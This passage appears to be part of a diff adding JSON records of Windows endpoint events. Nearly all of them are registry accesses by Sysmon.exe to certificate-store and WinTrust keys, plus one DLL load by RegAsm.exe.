"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { 
+ "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 
2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + 
"registry_value": "CTLs", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "apphelp.dll", + "image_path": "C:\\Windows\\SysWOW64\\apphelp.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + 
"registry_value": "Software Publishing", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": 
"CTLs", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + 